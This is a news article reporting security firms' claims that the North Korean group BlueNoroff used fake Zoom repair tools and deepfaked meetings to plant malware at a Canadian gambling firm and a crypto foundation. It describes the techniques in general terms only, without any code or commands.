Tim is a journalist, author, and columnist with two decades of experience writing for outlets like the BBC, the Guardian, and Chosun Ilbo. He is an expert on regulation, business, and industry and is fluent...
Read Full BioAn Ottawa-based security provider says North Korean hackers were behind a Zoom-themed attack on an unnamed Canadian gambling provider.
In a blog post, the cybersecurity company Field Effect claimed that a “North Korean threat actor” named BlueNoroff attacked as part of a “broader Zoom-themed campaign traced back to at least March 2025.”
‘North Korean Zoom Attacks’ On The Rise?
The security provider explained that on the morning of May 28, the gambling firm’s employees had scheduled a Zoom meeting on crypto-related matters with a contact they had previously worked with.
During the call, the gambling firm employees complained of a range of audio issues and pop-up warnings. The contact prompted the victim to run a “Zoom audio repair tool.”
However, the interlocutor was a hacker “impersonating a known contact.”
Soon, the “tool” installer began downloading benign software that leveraged legitimate Zoom components and permissible domains.
However, Field Effect explained that a closer examination of the script revealed “approximately 10,000 blank lines, followed by a command to download and execute an initial malware script.”
The gambling firm employees were eventually redirected to a Zoom-themed domain that “is not affiliated with the official Zoom platform.”
Once installed, the malware allegedly let the hackers collect sensitive information from the gambling firm’s networks.
These included keychain files and web browser profiles, such as login data, cookies, history, and extension settings.
The historical activity of the hackers and their post-exploitation activities suggest that they were hunting for crypto, as well as additional assets, harvestable credentials, and enterprise data.
The campaign employed a combination of social engineering methods and layered persistence.
The security company said there was a “strong likelihood” that the hackers wanted to steal coins from the gambling firm’s linked crypto wallets.
Field Effect claims that BlueNoroff was a financially motivated subgroup of the North Korean state-sponsored Lazarus Group.
Did Lazarus Mastermind Hack?
Analysts say that Lazarus has pulled off a vast number of hacks since it was founded in 2010. The most recent of these is allegedly the $11 million hack of the Taiwan-based crypto exchange BitPro in May.
Experts allege Lazarus is a unit of the Pyongyang-based Reconnaissance General Bureau. They say its goal is to generate funds for the North Korean regime.
Pyongyang has repeatedly denied allegations that it operates teams of crypto-hunting hackers, claiming that cyber-subterfuge is the unique preserve of Washington and its allies.
Field Effect claimed that BlueNoroff is also known as APT38, Stardust Chollima, BeagleBoyz, and NICKEL GLADSTONE.
It said the group consistently targets South Korea, Japan, North America, and Europe-based financial institutions, crypto firms, gaming companies, entertainment players, and fintech providers.
Security Firms: Hackers Operate on LinkedIn, Telegram
Earlier this month, the cybersecurity provider Huntress reported on its blog that an unnamed crypto firm also suffered a security breach at the hands of BlueNoroff.
The provider wrote: “An employee at a cryptocurrency foundation received a message from an external contact on their Telegram. The message requested time to speak to the employee.”
It continued: “The attacker sent a Calendly link to set up a meeting time. The link was for a Google Meet event. But when clicked, the URL redirected the end user to a fake Zoom domain controlled by the threat actor.”
Similarly, the crypto firm staffer then joined the group Zoom meeting, which “contained several deepfakes of known senior leadership within their company.”
When the crypto company employee experienced microphone issues, the deepfakes prompted them to download malware disguised as a Zoom extension, providing a link via Telegram.
Social Engineering Attacks
South Korean security providers have previously accused North Korean hackers of orchestrating sophisticated scams using virus-containing software distributed on platforms like LinkedIn.
In some cases, hackers have reportedly circulated trojans disguised as PDF files, LinkedIn updates, and Microsoft PowerPoint documents.
In many cases, would-be attackers allegedly pose as former employees or account executives at job search companies.
Last month, public prosecutors in South Korea said they were investigating a man they suspect of launching illegal gambling sites with the help of Pyongyang-based hackers.
